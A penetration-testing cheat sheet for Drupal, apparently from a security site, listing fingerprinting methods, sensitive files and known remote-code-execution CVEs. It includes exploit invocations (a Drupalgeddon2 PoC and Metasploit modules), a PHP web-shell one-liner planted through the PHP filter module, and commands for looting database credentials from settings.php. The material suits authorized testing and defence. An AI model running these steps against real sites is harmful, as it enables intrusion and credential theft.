Drupal | KagisoSec

Ports

Port	Proto	Notes
`80`	tcp	HTTP
`443`	tcp	HTTPS

Fingerprint

CHANGELOG.txt and the X-Generator header reveal the version
/node, /user/login and the Drupal cookie give it away; droopescan confirms

Key files

Path	Holds	Sensitive
`sites/default/settings.php`	DB credentials and the hash salt	sensitive

Default / weak creds

admin via brute force / reuse

Known CVEs

CVE	Impact
CVE-2018-7600	Drupalgeddon2, unauthenticated RCE
CVE-2018-7602	Drupalgeddon3, authenticated RCE
CVE-2019-6340	REST RCE via unserialize

Exploitation primitives

Drupalgeddon2/3 for unauthenticated or authenticated RCE on old cores
Admin: enable the PHP filter module and post a node containing PHP, or upload a backdoored module
settings.php DB creds for reuse

Overview

Drupal is a PHP CMS best known for the Drupalgeddon unauthenticated RCE chain. Even patched against those, admin access plus the PHP filter module is code execution.

Enumeration

Version (drives which Drupalgeddon applies):

curl -s http://<TARGET>/CHANGELOG.txt | head

droopescan scan drupal -u http://<TARGET>/

Unauthenticated RCE — Drupalgeddon2 (CVE-2018-7600)

Drupal core 7.x < 7.58 / 8.x < 8.5.1. Run a PoC:

python3 drupalgeddon2.py http://<TARGET>/

Or Metasploit:

msf > use exploit/unix/webapp/drupal_drupalgeddon2

REST unserialize RCE (8.x, CVE-2019-6340) when core REST + a GET/PATCH endpoint is on:

msf > use exploit/unix/webapp/drupal_restws_unserialize

Authenticated RCE (admin)

Enable the PHP filter module (Modules), then create a node / block with PHP body and set its text format to “PHP code”:

<?php system($_GET['c']); ?>

Browse the node with ?c=id. On Drupal 8+ (no PHP filter), upload a backdoored module instead.

Loot

curl -s http://<TARGET>/sites/default/settings.php   # DB creds + hash salt (via LFI/shell)

Hardening

Patch core promptly, remove the PHP filter module, and use strong admin auth.